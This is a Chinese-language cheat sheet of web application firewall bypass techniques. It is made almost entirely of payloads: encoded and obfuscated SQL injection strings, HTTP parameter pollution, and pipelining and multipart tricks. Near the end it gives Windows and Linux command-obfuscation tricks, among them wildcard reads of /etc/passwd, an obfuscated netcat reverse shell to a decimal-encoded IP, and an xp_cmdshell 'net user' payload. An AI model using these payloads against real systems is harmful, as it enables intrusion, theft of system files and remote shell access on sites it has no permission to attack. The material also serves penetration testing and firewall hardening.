【WAF绕过】姿势总结（一）

方法

Payload

编码

1、进行url编码（少数waf不会进行URL解码,部分waf进行一次url解码==>可对payload进行二次url编码）

2、Unicode编码：单引号 = %u0027、%u02b9、%u02bc

3、部分十六进制编码：adminuser = 0x61646D696E75736572

SQL编码：unicode、HEX、URL、ascll、base64等

5、XSS编码：HTML、URL、ASCII、JS编码、base64等

大小写变换

select = SELecT

关键字替换

And = &&

Or = ||

等于号 = like （或使用’<’ 和 ‘>’ 进行判断）

if(a,b,c) = case when(A) then B else C end

substr(str,1,1) = substr (str) from 1 for 1

limit 1,1 = limit 1 offset 1

Union select 1,2 = union select * from ((select 1)A join (select 2)B;

hex()、bin() = ascii()

sleep() = benchmark()

concat_ws() = group_concat()

mid()、substr() = substring()

@@user = user()

@@datadir = datadir()

特殊字符替换（空格或注释绕过）

sqlserver中：/**/、/*|%23--%23|*/ 

mysql中： %0a、%0a/**/、//*!*//、#A%0a

特殊字符重写绕过

selselectect

多请求拆分绕过

?a=[inputa]&b=[inputb]  ===》(参数拼接)  and a=[inputa] and b=[inputb]

参数放Cookie里面进行绕过

$_REQUEST（获取参数，会获取GET POST COOKIE）===>  若未检测cookie，我们可以放cookie里面

使用白名单绕过

admin dede install等目录特殊目录在白名单内

URL/xxx.php?id=1 union select …… ===》

1、URL/xxx.php/admin?id=1 union select……

2、URL/admin/..\xxx.php?id=1 union select……

内联注释绕过

id=1 and 1=1 ===》  id=1/*!and*/1=1

参数重写绕过

URL/xx.php?id=1 union select  ===》

URL/xx.php?id=1&id=union&id=select&id=……&id=

特殊字符拼接

mssql中，函数里面可以用+来拼接

?id=1;exec('maste'+'r..xp'+'_cmdshell'+'"net user"')

Windows特性

利用符号分割字符：whoami ==》 ((((Wh^o^am””i)))) 

利用变量分割关键字：whoami ==》 set a=who&&b=ami&&call %a%%b%

设置一个变量：set a=123whoami456  ===》 取出变量a的第3位开始共计6个字符：echo %a:~3,6%  ===》执行取出的值：%a:~3,6%

Linux特性

单引号或双引号连接符：whoami = w’h’o’a’m”i”

?,*通配符：Cat /etc/passwd = cat /?t*/??ss**

[] 通配符，匹配【】中的字符：whoami = /b[12312i]n/w[23sh]oa[2msh]i

变量拼接：Whoami = a=who&&b=ami&&$a$b

目录穿越：cat /../../etc/passwd =cd ..&&cd ..&&cd etc&&cat passwd

Shell反弹（127.0.0.1 → 2130706433）：nc -e /bin/bash 127.0.0.1 1234 =/??n/?c -e /??n/b??h 2130706433 1234

云waf

===》找真实IP

bp插件

bypass waf

http协议绕过

Content-Type绕过：application/x-www-form-urlencoded è multipart/form-data

请求方式绕过：更换请求方法

多Content-Disposition绕过：包含多个Content-Disposition时，中间件与waf取值不同 

keep-alive（Pipeline）绕过：手动设置Connection:keep-alive（未断开），然后在http请求报文中构造多个请求，将恶意代码隐藏在第n个请求中，从而绕过waf

修改编码方式：Charset=xxx进行绕过

Waf检测限制绕过

参数溢出

缓冲区溢出：

UnIoN SeLeCT ===》 and (select 1)=(Select 0xA*99999) UnIoN SeLeCT

and 1=1 ===》 and 1=1 and 99…99999 //此处省略N多个9

同网段/ssrf绕过